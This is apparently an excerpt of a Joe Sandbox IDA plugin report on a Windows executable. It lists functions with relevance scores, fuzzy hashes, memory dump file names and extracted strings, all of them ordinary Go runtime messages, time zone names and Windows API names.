Instruction ID: 17094ac6aff30687fc81867fd984ae8cd59eb4835f491e53e5879db93372ce1a
Opcode Fuzzy Hash: d2c16cf3a0aec3e5bd6530bd35d505b9672f8e6ea84d1db230fd1dd2251b4b88
Instruction Fuzzy Hash: DD413E35329B84DADA10EF14E4813AEBBB4F78A780F945525EB4D47726DF38C944DB10

Function 00A96280 Relevance: 6.4, Strings: 5, Instructions: 104COMMON

Download Yara Rule

Strings

runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [contro, xrefs: 00A96325
, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark termi, xrefs: 00A963EF
unexpected g statusunknown wait reasonwinmm.dll not foundzero length segment markroot jobs done to unallocated span37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCrea, xrefs: 00A9641A
, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS, xrefs: 00A96345, 00A963CF
, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f, xrefs: 00A96365

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: , g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark termi$, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS$, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f$runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [contro$unexpected g statusunknown wait reasonwinmm.dll not foundzero length segment markroot jobs done to unallocated span37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCrea
API String ID: 0-1850619135
Opcode ID: 38a2ae53e56948872c25d123abb0ab2e48a1e8ca88dd86152701cd88f2ecd101
Instruction ID: c58e83d03565e3e9bd79ee937bfa699146eb8ca5c1b3cf3f32999b1326bdb09a
Opcode Fuzzy Hash: 38a2ae53e56948872c25d123abb0ab2e48a1e8ca88dd86152701cd88f2ecd101
Instruction Fuzzy Hash: 5B410036729B808ADB10FB24E99135EBBE4F78A740F485565EF8D07716CB39C914DB20

Function 00A6B0E0 Relevance: 6.3, Strings: 5, Instructions: 75COMMON

Download Yara Rule

Strings

-> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINE, xrefs: 00A6B1C5
runtime: lfstack.push invalid packing: node=span on userArena.faultList has invalid sizeunsafe.Slice: ptr is nil and len is not zerouse of WriteTo with pre-connected connectioncannot send after transport endpoint shutdowncharacter string exceeds maximum length, xrefs: 00A6B167
lfstack.pushmadvdontneedmheapSpecialmspanSpecialnetapi32.dllno such hostnot pollablereleasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB glo, xrefs: 00A6B1EF
packed= pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeorgianGoStringGujaratiGurmukhiHiraganaIsWindowJavaneseKatakanaKaya, xrefs: 00A6B1A5
cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefaultfiles, xrefs: 00A6B185

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINE$ cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefaultfiles$ packed= pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeorgianGoStringGujaratiGurmukhiHiraganaIsWindowJavaneseKatakanaKaya$lfstack.pushmadvdontneedmheapSpecialmspanSpecialnetapi32.dllno such hostnot pollablereleasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB glo$runtime: lfstack.push invalid packing: node=span on userArena.faultList has invalid sizeunsafe.Slice: ptr is nil and len is not zerouse of WriteTo with pre-connected connectioncannot send after transport endpoint shutdowncharacter string exceeds maximum length
API String ID: 0-2075784399
Opcode ID: 151353bd4079fcd250662ed021ad78d1162bffb2dc2416eedfee025d3d7d069b
Instruction ID: c0a0d616a06ffedda218a21f79f2dc27a92c535d2d466e49cb2c0d9ec11ce63e
Opcode Fuzzy Hash: 151353bd4079fcd250662ed021ad78d1162bffb2dc2416eedfee025d3d7d069b
Instruction Fuzzy Hash: 1B313E32328B84D6DB10EF11F94136EBBA4F789780F489521EE9E47B26DF38C5548760

Function 00A67860 Relevance: 5.3, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [, xrefs: 00A6788B
r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked m, xrefs: 00A67A45
cs deadlockexecwaitfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unkn, xrefs: 00A67CC5
r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unknown(wsaioctl (forced) -> node= B exp.) B work ( blocked, xrefs: 00A67AC5

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: cs deadlockexecwaitfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unkn$r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unknown(wsaioctl (forced) -> node= B exp.) B work ( blocked$r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked m$rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [
API String ID: 0-1586173954
Opcode ID: cc83a4b04e3b5c77ed0aa02e41516c93a7c1c671f9e917390c7aafd612ad363a
Instruction ID: 8868eff63bf043127aa98bbe118cd8c437ae1b4bd1af59d963e0c06c440843be
Opcode Fuzzy Hash: cc83a4b04e3b5c77ed0aa02e41516c93a7c1c671f9e917390c7aafd612ad363a
Instruction Fuzzy Hash: 10C1A936328B4485CE40FB65E69236EBBA4FB89B80F459421FE8D07727DF38C54497A1

Function 00AA9C60 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

stack size not a power of 2stopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionswork.nwait was > work.nproc args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W., xrefs: 00AA9EFC
stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic linkswaiting for unsupported file type3552713678800500929355621337890625CM_Get_Device_Interface_List, xrefs: 00AA9F0D
out of memory (stackalloc)persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to meunknown ABI parameter kinduse of invalid sweepLocker, xrefs: 00AA9D04
out of memoryprofMemActiveprofMemFutureruntime: seq=runtime: val=srmount errortimeEndPeriodtimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: needspinning= nmidlelocked= on zero Value out of range procedure in to finalizer untype, xrefs: 00AA9DDD

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: out of memory (stackalloc)persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to meunknown ABI parameter kinduse of invalid sweepLocker$out of memoryprofMemActiveprofMemFutureruntime: seq=runtime: val=srmount errortimeEndPeriodtimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: needspinning= nmidlelocked= on zero Value out of range procedure in to finalizer untype$stack size not a power of 2stopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionswork.nwait was > work.nproc args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W.$stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic linkswaiting for unsupported file type3552713678800500929355621337890625CM_Get_Device_Interface_List
API String ID: 0-2030398157
Opcode ID: 9ab5a005a69e037e05d306c9e13a59ca37019aedc465934f9063fb845c04cb0f
Instruction ID: 7dfc11baf7dbdb92c9072d828b49589a67bb36ce3948783084071515860012f6
Opcode Fuzzy Hash: 9ab5a005a69e037e05d306c9e13a59ca37019aedc465934f9063fb845c04cb0f
Instruction Fuzzy Hash: 0F61AE36705B9486EF14DB15E08136EB7A5F78AB90F544126EB8E47BA5DF38C881C740

Function 00A7BAC0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

non in-use span found with specials bit setroot level max pages doesn't fit in summaryruntime.SetFinalizer: finalizer already setruntime.SetFinalizer: first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: releaseSudog with non-nil gp.paramru, xrefs: 00A7BD2F
gc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremote I/O errorruntime: addr = runt, xrefs: 00A7BCEA
sweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGG, xrefs: 00A7BCAF
s.state = schedtracesemacquiresetsockoptstackLarget.Kind == terminatedtracefree(tracegc()unknown pcuser32.dllws2_32.dll of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->stat, xrefs: 00A7BD05

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: gc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremote I/O errorruntime: addr = runt$non in-use span found with specials bit setroot level max pages doesn't fit in summaryruntime.SetFinalizer: finalizer already setruntime.SetFinalizer: first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: releaseSudog with non-nil gp.paramru$s.state = schedtracesemacquiresetsockoptstackLarget.Kind == terminatedtracefree(tracegc()unknown pcuser32.dllws2_32.dll of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->stat$sweep sysmontelnettimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGG
API String ID: 0-126800551
Opcode ID: 5e9ec5a1c91c230968a1cd70b195d62fb991f56053acdd3fbbd490f853bad215
Instruction ID: 308a2363973ed443e2249db36638f84593c53093260df6a41a39717e463dcfa2
Opcode Fuzzy Hash: 5e9ec5a1c91c230968a1cd70b195d62fb991f56053acdd3fbbd490f853bad215
Instruction Fuzzy Hash: 68619072628B8486DB10AF11E9403AEB7B4F785B84F589122FF8E1772ACF38C955C750

Function 00A6D9A0 Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to meunknown ABI parameter kinduse of invalid sweepLockerwakep: negative nmspinning, xrefs: 00A6DC25
persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 called with prec > 9too many Questions to pack (>65535)traceback did not unwind completelytransport endpo, xrefs: 00A6DBFF
runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x]unsafe.String: len out of range (types from different packages)28421709430404007434844970703125CertAddCer, xrefs: 00A6DBDE
persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsweep: tried to preserve a user arena spanunexpected signal during runtime executionupdateStatus with no service status handleexec: WaitDelay expired before I/O completegcBgMar, xrefs: 00A6DC10

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsweep: tried to preserve a user arena spanunexpected signal during runtime executionupdateStatus with no service status handleexec: WaitDelay expired before I/O completegcBgMar$persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 called with prec > 9too many Questions to pack (>65535)traceback did not unwind completelytransport endpo$persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to meunknown ABI parameter kinduse of invalid sweepLockerwakep: negative nmspinning$runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x]unsafe.String: len out of range (types from different packages)28421709430404007434844970703125CertAddCer
API String ID: 0-2304456831
Opcode ID: 49c5724f9e4a25be012880dc14463fed83879fa3a0fe712a9b27680bd8155cd5
Instruction ID: 532520cc388404aa300d0d794717c0045103829e60fcea3eaa51c2bea78fe094
Opcode Fuzzy Hash: 49c5724f9e4a25be012880dc14463fed83879fa3a0fe712a9b27680bd8155cd5
Instruction Fuzzy Hash: 5F615676B09B8486DB20DF15E58039AB7B5F789BD4F949122EB8D47B29DB38C984C700

Function 00A74DC0 Relevance: 5.1, Strings: 4, Instructions: 131COMMON

Download Yara Rule

Strings

refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 calle, xrefs: 00A74FD6
span has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p state) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertif, xrefs: 00A74F91
bad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv, xrefs: 00A74FC5
out of memoryprofMemActiveprofMemFutureruntime: seq=runtime: val=srmount errortimeEndPeriodtimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: needspinning= nmidlelocked= on zero Value out of range procedure in to finalizer untype, xrefs: 00A74FA5

